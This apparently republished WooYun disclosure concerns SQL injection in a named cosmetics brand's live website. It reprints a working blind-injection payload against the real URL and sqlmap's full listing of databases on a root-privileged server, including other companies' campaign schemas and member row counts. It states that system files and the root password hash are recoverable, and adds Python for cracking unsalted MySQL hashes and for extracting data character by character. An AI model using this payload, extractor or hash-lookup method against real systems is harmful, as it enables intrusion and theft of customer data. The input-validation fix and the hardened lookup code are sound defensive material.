WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2016-02-20: Details reported to the vendor; awaiting vendor handling. 2016-02-25: The vendor actively ignored the vulnerability; details disclosed to the public.
SQL injection vulnerability in a brand website under Liby (立白), with multiple databases exposed
Cogi Cosmetics Co., Ltd. (高姿化妆品有限公司) has more than 20 years of history and is a well-known cosmetics company in China's daily-chemicals industry. Its consistent product quality has earned it the trust and praise of consumers. In 2006 the company went through an asset restructuring with the Liby Group (立白集团), out of which Shanghai New Cogi Cosmetics Co., Ltd. (上海新高姿化妆品有限公司) was formed in a fiercely competitive cosmetics market.
Vulnerable URL: http://www.cogi.cn/pcat.php?pcat=1 (GET). The Cogi website, a Liby brand, has a SQL injection vulnerability in the pcat parameter, and multiple databases are reachable through it.
sqlmap output for the pcat parameter:

---
Parameter: pcat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pcat=1 AND 6422=6422
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.12
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'db_cogi'
current user is DBA: True
Multiple databases involved. Because the injected query runs as root@localhost with DBA rights, every schema on the MySQL server could be enumerated, not just db_cogi (sqlmap database and table listing follows):
Database: sms_3 [6 tables]
    sms_clients, sms_kv, sms_news, sms_picture, sms_show, sms_user

Database: hrapp [14 tables]
    ad_access, ad_admin, ad_field, ad_input, ad_model, ad_node, ad_order, ad_photo, ad_photo_like, ad_question, ad_role, ad_role_admin, ad_test, ad_user

Database: hikalimedia [5 tables]
    hik_category, hik_kvlist, hik_product, hik_thumb, hik_user

Database: cogi [2 tables]
    cogi_register, cogi_user

Database: mysql [24 tables]
    user, columns_priv, db, event, func, general_log, help_category, help_keyword, help_relation, help_topic, host, ndb_binlog_index, plugin, proc, procs_priv, proxies_priv, servers, slow_log, tables_priv, time_zone, time_zone_leap_second, time_zone_name, time_zone_transition, time_zone_transition_type

Database: cat_maxmara_150624 [22 tables]
    cms_article, cms_article_cate, cms_material, mar_action, mar_bag, mar_banner, mar_city, mar_classify, mar_cloths, mar_lastvideo, mar_shop, mar_video, mar_word, shop_organization, sys_company, sys_log, sys_permission, sys_role, sys_role_permission, sys_user, sys_user_role, sys_welcome

Database: smartdb [5 tables]
    smart_case, smart_category, smart_consulting, smart_dynamic, smart_user

Database: zhoudafu [4 tables]
    zdf_admin, zdf_blesses, zdf_modules, zdf_users

Database: elle_db_a [7 tables]
    calendars, kvimage, mybenefits, mybenefitsaddress, styles, styles4pic, userinfo

Database: vendor3 [19 tables]
    module, category, comment, content3, contentindex, greetingcard, log, manager, member, menu, module_field, schools, serviceorders, sessionvalue, spider_log, typelist, usergroup, webconfig, webconfig_param

Database: zphome [159 tables]
    TABLE 106, a_admin, a_modules, a_projects, adidas1309_photos, aha_admin, aha_anwsers, aha_ranks, aha_results, aha_shares, aha_stageanswers, aha_users, artistry151012, banggo4_codes, banggo4_prizes, banggo4_scores, banggo_admin, banggo_blocks, banggo_data, banggo_daygifts, banggo_gameinfos, banggo_gifts, banggo_modules, banggo_questions, banggo_settings, banggo_tasks, banggo_transactions, banggo_userexchanges, banggo_usergifts, banggo_users, banggo_usertasks, chanel0611_admin, chanel0611_modules, chanel0611_photos, christmas_admin, christmas_goods, christmas_modules, christmas_photos, cms_categories, cms_comments, cms_extend, cms_meta, cms_page_meta, cms_pages, cms_post_meta, cms_posts, cms_sessions, cms_users, cogiegg_admin, cogiegg_breaks, cogiegg_gifts, cogiegg_modules, cogiegg_prizes, cogiegg_users, dove130531_userimages, dove130531_users, edm_users, esteelauder1403_photos, esteelauder1403_votes, helena_register, helena_user, hr_white_users, lavenue_active, lavenue_brand, lavenue_category, lavenue_club, lavenue_newopen, lavenue_news, lavenue_register, lavenue_thumb, lavenue_user, lavenue_vedio, loreal100_admin, loreal100_adminmodules, loreal100_users, loreal100_votes, lux1304_admin, lux1304_blackips, lux1304_cards, lux1304_cards_001, lux1304_modules, lux1304_offlines, lux1304_shares, lux1304_tests_001, lux1304_tests_new, lux1304_users, lux1304_users_001, lux1304_users_002, lux1304_users_003, mascara_users, maxmara0428_register, maxmara0428_user, maxmara150512, maxmara_prize, maxmara_register, maxmara_registerprize, maxmara_score, maxmara_user, maxmara_webconfig, maxmara_winaprize, maxus0820_admin, maxus0820_ci_sessions, maxus0820_config_common, maxus0820_config_site, maxus0820_config_site_admin, maxus0820_model, maxus0820_power, maxus0820_power_group, maxus0820_vote, mrts_wechat_0, neiman_votes, nzj_register, nzj_user, nzj_vote, oreal0721_admin, oreal0721_candidate_info, oreal0721_ci_sessions, oreal0721_config_common, oreal0721_config_site, oreal0721_config_site_admin, oreal0721_power, oreal0721_power_group, oreal0721_vote_log, prodigycream_users, pt0819, pt1225_prd, pt1225_vote, restylane1304_admin, restylane1304_modules, restylane1304_smiles, restylane1304_tips, restylane1304_userimages, restylane1304_users, restylane1304_votes, sheep_userimages, sheep_users, sheep_votes, shj2012_users, siemens_blesses, tiffany1403_votes, whiteadmin, whiteuserinfo, whiteusers, whiteusertips, yvesrocher_users, zdf_admin, zdf_blesses, zdf_modules, zdf_users, zdfu_prize, zdfu_register, zdfu_registerprize, zdfu_score, zdfu_user, zdfu_webconfig, zdfu_winaprize, zippo151121_code, zippo151121_lottery, zippo151121_user

Database: test [7 tables]
    calendars, kvimage, mybenefits, mybenefitsaddress, styles, styles4pic, userinfo

Database: v6_hr [3 tables]
    customer, first_five_invit, regular_customer

Database: style_business [17 tables]
    ds_brand, ds_category, ds_colour, ds_deliveryaddress, ds_emailtemplate, ds_excandpro, ds_exclusive, ds_homepage, ds_homepagepro, ds_message, ds_messagetype, ds_orders, ds_product, ds_register, ds_shoppingcart, ds_thumb, ds_user

Database: kc_db [6 tables]
    kc_clients, kc_kv, kc_news, kc_picture, kc_show, kc_user

Database: information_schema [40 tables]
    CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, ENGINES, EVENTS, FILES, GLOBAL_STATUS, GLOBAL_VARIABLES, INNODB_BUFFER_PAGE, INNODB_BUFFER_PAGE_LRU, INNODB_BUFFER_POOL_STATS, INNODB_CMP, INNODB_CMPMEM, INNODB_CMPMEM_RESET, INNODB_CMP_RESET, INNODB_LOCKS, INNODB_LOCK_WAITS, INNODB_TRX, KEY_COLUMN_USAGE, PARAMETERS, PARTITIONS, PLUGINS, PROCESSLIST, PROFILING, REFERENTIAL_CONSTRAINTS, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, SESSION_STATUS, SESSION_VARIABLES, STATISTICS, TABLES, TABLESPACES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS

Database: iaactdb [6 tables]
    iaact_clients, iaact_kv, iaact_news, iaact_picture, iaact_show, iaact_user

Database: johnhenry [5 tables]
    archive_coupon, archive_register, archive_registercoupon, archive_user, archive_webconfig

Database: db_cogi [9 tables]
    tb_article, tb_media, tb_menber, tb_pcat, tb_prd, tb_pseries, tb_star, tb_trend, tb_user

Database: asus100 [7 tables]
    asus_hobbytype, asus_person, asus_picture, asus_user, asus_usertype, asus_weibomsg, asus_weibotype

Database: wechatcms [283 tables]
    hr_admin, hr_details, hr_gifts, hr_orders, hr_users, pigcms_access, pigcms_activity, pigcms_adma, pigcms_alipay_config, pigcms_api, pigcms_areply, pigcms_attribute, pigcms_autumns_box, pigcms_autumns_ip, pigcms_autumns_open, pigcms_banners, pigcms_behavior, pigcms_broker, pigcms_broker_client, pigcms_broker_commission, pigcms_broker_item, pigcms_broker_optionlog, pigcms_broker_translation, pigcms_broker_user, pigcms_busines, pigcms_busines_comment, pigcms_busines_main, pigcms_busines_pic, pigcms_busines_second, pigcms_car, pigcms_car_utility, pigcms_carmodel, pigcms_carnews, pigcms_carowner, pigcms_carsaler, pigcms_carseries, pigcms_carset, pigcms_caruser, pigcms_case, pigcms_caseclass, pigcms_catemenu, pigcms_classify, pigcms_company, pigcms_company_staff, pigcms_crowdfunding, pigcms_crowdfunding_focus, pigcms_crowdfunding_order, pigcms_crowdfunding_reward, pigcms_custom_field, pigcms_custom_info, pigcms_custom_limit, pigcms_custom_set, pigcms_dining_table, pigcms_dish, pigcms_dish_company, pigcms_dish_like, pigcms_dish_order, pigcms_dish_sort, pigcms_dish_table, pigcms_dishout_manage, pigcms_dishout_salelog, pigcms_diyform, pigcms_diyform_set, pigcms_diymen_class, pigcms_diymen_set, pigcms_dream, pigcms_estate, pigcms_estate_album, pigcms_estate_expert, pigcms_estate_housetype, pigcms_estate_impress, pigcms_estate_impress_add, pigcms_estate_nav, pigcms_estate_son, pigcms_files, pigcms_flash, pigcms_forum_comment, pigcms_forum_config, pigcms_forum_message, pigcms_forum_topics, pigcms_funclass, pigcms_function, pigcms_funintro, pigcms_game_config, pigcms_game_records, pigcms_games, pigcms_greeting_card, pigcms_helping, pigcms_helping_user, pigcms_home, pigcms_home_background, pigcms_host, pigcms_host_list_add, pigcms_host_order, pigcms_hotels_house, pigcms_hotels_house_sort, pigcms_hotels_image, pigcms_hotels_order, pigcms_images, pigcms_img, pigcms_img_multi, pigcms_indent, pigcms_invite, pigcms_invite_enroll, pigcms_invite_meeting, pigcms_invite_partner, pigcms_invite_plan, pigcms_invite_user, pigcms_keyword, pigcms_leave, pigcms_links, pigcms_live, pigcms_live_company, pigcms_live_content, pigcms_lottery, pigcms_lottery_cheat, pigcms_lottery_record, pigcms_market, pigcms_market_area, pigcms_market_cate, pigcms_market_nav, pigcms_market_park, pigcms_market_slide, pigcms_medical_set, pigcms_medical_user, pigcms_member, pigcms_member_card_contact, pigcms_member_card_coupon, pigcms_member_card_coupon_record, pigcms_member_card_create, pigcms_member_card_custom, pigcms_member_card_exchange, pigcms_member_card_focus, pigcms_member_card_gifts, pigcms_member_card_info, pigcms_member_card_integral, pigcms_member_card_notice, pigcms_member_card_pay_record, pigcms_member_card_set, pigcms_member_card_sign, pigcms_member_card_use_record, pigcms_member_card_vip, pigcms_mobilesite, pigcms_moopha_article, pigcms_moopha_attachement, pigcms_moopha_channel, pigcms_moopha_channel_contentattribute, pigcms_moopha_keywords, pigcms_moopha_picture, pigcms_moopha_site, pigcms_moopha_template, pigcms_moopha_user, pigcms_msg, pigcms_nearby_user, pigcms_news, pigcms_node, pigcms_norms, pigcms_notice_record, pigcms_ordering_class, pigcms_ordering_set, pigcms_orderprinter, pigcms_other, pigcms_panorama, pigcms_photo, pigcms_photo_list, pigcms_photo_log, pigcms_platform_pay, pigcms_popularity, pigcms_popularity_prize, pigcms_popularity_share, pigcms_popularity_user, pigcms_present, pigcms_problem_game, pigcms_problem_option, pigcms_problem_question, pigcms_problem_question_log, pigcms_problem_user, pigcms_product, pigcms_product_attribute, pigcms_product_cart, pigcms_product_cart_list, pigcms_product_cat, pigcms_product_comment, pigcms_product_detail, pigcms_product_diningtable, pigcms_product_group, pigcms_product_image, pigcms_product_mail_price, pigcms_product_relation, pigcms_product_setting, pigcms_punish, pigcms_punish_item, pigcms_qcloud_sendout, pigcms_qcloud_user, pigcms_question_bank, pigcms_recipe, pigcms_recognition, pigcms_red_packet, pigcms_red_packet_exchange, pigcms_red_packet_log, pigcms_red_packet_prize, pigcms_red_packet_reward, pigcms_renew, pigcms_reply, pigcms_reply_info, pigcms_requestdata, pigcms_research, pigcms_research_answer, pigcms_research_question, pigcms_research_result, pigcms_reservation, pigcms_reservebook, pigcms_role, pigcms_role_user, pigcms_router, pigcms_router_config, pigcms_school_cat, pigcms_school_classify, pigcms_school_score, pigcms_school_set_index, pigcms_school_students, pigcms_school_tcourse, pigcms_school_teachers, pigcms_seckill_action, pigcms_seckill_base_shop, pigcms_seckill_book, pigcms_seckill_share, pigcms_seckill_shop_thum, pigcms_seckill_users, pigcms_selfform, pigcms_selfform_input, pigcms_selfform_value, pigcms_send_message, pigcms_share, pigcms_share_set, pigcms_sign_conf, pigcms_sign_in, pigcms_sign_set, pigcms_site_plugmenu, pigcms_sms_code, pigcms_sms_expendrecord, pigcms_sms_record, pigcms_snccode, pigcms_store_flash, pigcms_styleset, pigcms_system_info, pigcms_taobao, pigcms_tempmsg, pigcms_text, pigcms_token_open, pigcms_twitter_count, pigcms_twitter_log, pigcms_twitter_remove, pigcms_twitter_set, pigcms_unitary, pigcms_unitary_cart, pigcms_unitary_lucknum, pigcms_unitary_order, pigcms_unitary_user, pigcms_update_record, pigcms_upyun_attachement, pigcms_user, pigcms_user_group, pigcms_user_request, pigcms_userinfo, pigcms_users, pigcms_voiceresponse, pigcms_vote, pigcms_vote_item, pigcms_vote_record, pigcms_weather, pigcms_wecha_user, pigcms_wechat_group, pigcms_wechat_group_list, pigcms_wechat_scene, pigcms_wecht_grout, pigcms_wedding, pigcms_wedding_info, pigcms_wehcat_member_enddate, pigcms_wxuser, pigcms_yeepay_tmp, pigcms_zhida, tp_system_info

Database: techpool [16 tables]
    meet_answer, meet_guestinfo, meet_invite, meet_meetingguestrelation, meet_meetinginfo, meet_meetingplace, meet_meetingtype, meet_meetinguserrelation, meet_news, meet_optionresult, meet_question, meet_schedule, meet_talentplan, meet_user, meet_userinfo, meet_userloginfo

Database: web0 [13 tables]
    ad_access, ad_admin, ad_field, ad_input, ad_model, ad_node, ad_order, ad_photo, ad_photo_like, ad_question, ad_role, ad_role_admin, ad_user

Database: tianpu [27 tables]
    cms_article, cms_article_cate, cms_material, hos_article, hos_comment, hos_conference, hos_guide, hos_newspper, hos_notice_contributors, hos_subject, hos_time, hos_time_newspper, hos_transshipment, hos_video, hos_video_type, hos_writer, hos_writer_type, hos_year, shop_organization, sys_company, sys_log, sys_permission, sys_role, sys_role_permission, sys_user, sys_user_role, sys_welcome

Database: appnice [26 tables]
    admin, api_access, api_keys, api_limits, api_logs, api_tokens, comments, config_common, config_site, config_site_admin, integrals, labels, labels2stores, messages, operates, photos, power, power_group, push_logs, recommend_type, sources, stores, tags, thesaurus, tops, users

Database: vendor_a [6 tables]
    forte06_greetingcard, forte06_manager, forte06_menu, forte06_usergroup, forte06_webconfig, forte06_webconfig_param

Database: performance_schema [17 tables]
    cond_instances, events_waits_current, events_waits_history, events_waits_history_long, events_waits_summary_by_instance, events_waits_summary_by_thread_by_event_name, events_waits_summary_global_by_event_name, file_instances, file_summary_by_event_name, file_summary_by_instance, mutex_instances, performance_timers, rwlock_instances, setup_consumers, setup_instruments, setup_timers, threads

Database: hrapp_crowdfunding2016 [15 tables]
    ad_access, ad_admin, ad_field, ad_input, ad_model, ad_node, ad_order, ad_order_pay_detail, ad_paytest, ad_photo, ad_product, ad_question, ad_role, ad_role_admin, ad_user

Database: vendor1 [36 tables]
    elle0811_members, elle0811_users, elle0811_votes, forte150521_awards, forte150521_draws, forte150521_userinfos, forte150521_users, forte150921_cities, forte150921_donates, forte150921_members, forte150921_projects, forte150921_userinfos, forte150921_users, honda0720_likes, honda0720_photos, honda0720_users, hr150211_messages, hr150211_users, lavenue_active, lavenue_brand, lavenue_category, lavenue_club, lavenue_newopen, lavenue_news, lavenue_register, lavenue_thumb, lavenue_user, lavenue_vedio, techpool_meetings, techpool_members, techpool_signs, techpool_users, zippo_codes, zippo_members, zippo_users, zippo_votes

Database: styletv [4 tables]
    tb_bindaccount, tb_generalize, tb_sysinfo, tb_user

Database: acense [3 tables]
    dolls, migrations, tools

Database: vendor5 [24 tables]
    360_categories_entries, 360_categories, 360_category_groups, 360_content_field_types, 360_content_fields, 360_content_types_admin_groups, 360_content_types, 360_entries_data, 360_entries, 360_galleries, 360_gallery_images, 360_groups, 360_navigation_items, 360_navigations, 360_product_forward, 360_product_post, 360_product, 360_publish_logs, 360_revision_resource_types, 360_revisions, 360_settings, 360_snippets, 360_users, 360_weibo_user

Database: vendor4 [40 tables]
    module, advert, category, comment, content29, content3, content30, content31, content32, content33, contentindex, log, manager, member, menu, mlqs_category, mlqs_comment, mlqs_content3, mlqs_contentindex, mlqs_log, mlqs_manager, mlqs_member, mlqs_menu, mlqs_module, mlqs_module_field, mlqs_schools, mlqs_sessionvalue, mlqs_spider_log, mlqs_typelist, mlqs_usergroup, mlqs_webconfig, mlqs_webconfig_param, mlqs_weekresult, module_field, schools, spider_log, typelist, usergroup, webconfig, webconfig_param

Database: cat_money [47 tables]
    cms_article, cms_article_cate, cms_material, man_advertise, man_advertise_audit, man_advice, man_bankcard, man_banner, man_bill, man_borrower, man_buyinfo, man_check, man_credite, man_credite_bag, man_dart_get, man_dart_send, man_dart_week, man_dictionary, man_exception, man_export, man_firstbanner, man_formula, man_hold_image, man_interest, man_often_quest, man_page, man_pay_order, man_pro_crbag, man_product_lock, man_product_nolock, man_profit, man_profit_info, man_push, man_recharge, man_redeem, man_subscribe, man_trade, man_user, shop_organization, sys_company, sys_log, sys_permission, sys_role, sys_role_permission, sys_user, sys_user_role, sys_welcome

Database: cat_iself [26 tables]
    cms_article, cms_article_cate, cms_material, is_area, is_check, is_city, is_collect, is_custom, is_like, is_privilege, is_product, is_season_action, is_shop, is_travel, is_tripInfo, is_user, is_user_like, shop_organization, sys_company, sys_log, sys_permission, sys_role, sys_role_permission, sys_user, sys_user_role, sys_welcome
Nearly 20,000 Cogi member account records (row counts for db_cogi):
Database: db_cogi

Table         Entries
tb_menber       19522
tb_prd            227
tb_media          101
tb_trend           88
tb_pseries         32
tb_pcat            19
tb_article          4
tb_star             2
tb_user             2
/etc/passwd can be read through the injection (file reads are possible because the DBA root account carries the FILE privilege).
The password hashes of multiple database users can be read (from mysql.user).
The database root user's password can be recovered from its hash via cmd5 (an online hash lookup service).
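Why an online lookup such as cmd5 recovers the root password from the dumped hash: MySQL 5 stores mysql_native_password hashes in mysql.user as an unsalted double SHA-1, so the same password always yields the same hash and a precomputed table answers it instantly. The following Python is an added example and not part of the original report; the mysql.user rows are constructed (the only real value is the well-known hash of the string 'password'), the other account names and passwords are assumed, and the small wordlist stands in for a lookup service.

```python
import hashlib


def mysql_native_password(plaintext: str) -> str:
    """Reproduce MySQL's PASSWORD() / mysql_native_password hash.

    The stored value is '*' followed by SHA1(SHA1(password)) in uppercase hex.
    There is no per-user salt, so a leaked hash can be looked up in a precomputed table.
    """
    inner = hashlib.sha1(plaintext.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed sample of `SELECT user, host, password FROM mysql.user` as it would be
# dumped through the injection. The root row carries the well-known hash of 'password';
# the other two rows are assumed accounts whose hashes are generated here for the demo.
SAMPLE_MYSQL_USER = [
    ("root", "localhost", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("cogi_app", "localhost", mysql_native_password("cogi2016")),
    ("backup", "%", mysql_native_password("Xq7!vL2#pR9mZe")),
]

# Stand-in for an online lookup service: a handful of words instead of billions of entries.
WORDLIST = ["123456", "password", "root", "admin", "cogi2016", "qwerty"]


def build_lookup_table(words):
    """Precompute hash -> plaintext, which is exactly what a lookup service sells access to."""
    return {mysql_native_password(w): w for w in words}


def recover_passwords(rows, words):
    """Map each (user, host) to the recovered plaintext, or None if the hash is not in the table."""
    table = build_lookup_table(words)
    return {(user, host): table.get(hash_value) for user, host, hash_value in rows}


def weak_accounts(rows, words):
    """Accounts whose password was recovered; these must be rotated immediately."""
    return sorted(k for k, v in recover_passwords(rows, words).items() if v is not None)


if __name__ == "__main__":
    for (user, host), pw in recover_passwords(SAMPLE_MYSQL_USER, WORDLIST).items():
        print(f"{user}@{host}: {pw if pw else '<not in table>'}")
```

The lookup needs no cracking hardware at all: one SHA-1 pair per candidate, computed once, serves every MySQL server in the world, which is why a dictionary password on a root account that is also reachable through a web injection is effectively plaintext. A random password defeats the table but not the unsalted format; only newer plugins such as caching_sha2_password (the MySQL 8 default) add a salt.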
Fix recommendation: filter the pcat input (it should only ever be an integer), and change the database passwords.
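The finding and the fix together, in runnable form. The following Python is an added example, not code from cogi.cn (the source of pcat.php is not on this page): an in-memory SQLite database with constructed tables and values stands in for the MySQL backend (SQLite's unicode() and substr() replace MySQL's ASCII() and SUBSTRING(); the technique is otherwise identical), the vulnerable lookup shows why "pcat=1 AND 6422=6422" is a working boolean oracle, extract_value reads an arbitrary string through that oracle the way sqlmap does in boolean-based blind mode, and safe_lookup is the type check plus parameter binding that the recommendation above calls for.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the cogi.cn backend (SQLite instead of MySQL)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE tb_pcat (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO tb_pcat VALUES (1, 'skincare'), (2, 'makeup');
        CREATE TABLE tb_user (id INTEGER PRIMARY KEY, name TEXT, pwd TEXT);
        INSERT INTO tb_user VALUES (1, 'admin', 's3cret');
    """)
    return con


def vulnerable_lookup(con, pcat: str):
    """The bug: the GET parameter is pasted into the SQL text, so 'pcat' can extend the WHERE clause."""
    sql = "SELECT id, name FROM tb_pcat WHERE id = " + pcat
    return con.execute(sql).fetchall()


def safe_lookup(con, pcat: str):
    """The fix: reject anything that is not an integer, then bind the value as a parameter."""
    if not pcat.isdigit():
        raise ValueError("pcat must be an integer")
    return con.execute("SELECT id, name FROM tb_pcat WHERE id = ?", (int(pcat),)).fetchall()


def is_rejected(con, pcat: str) -> bool:
    """True if the hardened lookup refuses the input instead of executing it."""
    try:
        safe_lookup(con, pcat)
    except ValueError:
        return True
    return False


def oracle(con, condition: str) -> bool:
    """Boolean-based blind: a true condition keeps the category row, a false one drops it."""
    return bool(vulnerable_lookup(con, f"1 AND ({condition})"))


def extract_value(con, subquery: str, max_len: int = 64) -> str:
    """Read any string from the database one character at a time through the yes/no oracle.

    Each character costs about seven requests (binary search over printable ASCII 32..126).
    """
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(con, f"length(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    con = make_db()
    print("true  payload:", vulnerable_lookup(con, "1 AND 6422=6422"))
    print("false payload:", vulnerable_lookup(con, "1 AND 6422=6423"))
    print("extracted:", extract_value(con, "SELECT pwd FROM tb_user WHERE name='admin'"))
    print("hardened rejects payload:", is_rejected(con, "1 AND 6422=6422"))
```

Against the live site the same loop runs over HTTP, with the condition placed in the pcat parameter and the two responses told apart by page content; every schema listed above was readable this way only because the application connects as root with DBA rights, so beyond the input check the application account should be replaced by a dedicated user limited to db_cogi and without the FILE privilege.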
Severity: no impact (vendor ignored)
Ignored at: 2016-02-25 08:10
Vulnerability Rank: 4 (WooYun rating)
Vendor reply: none.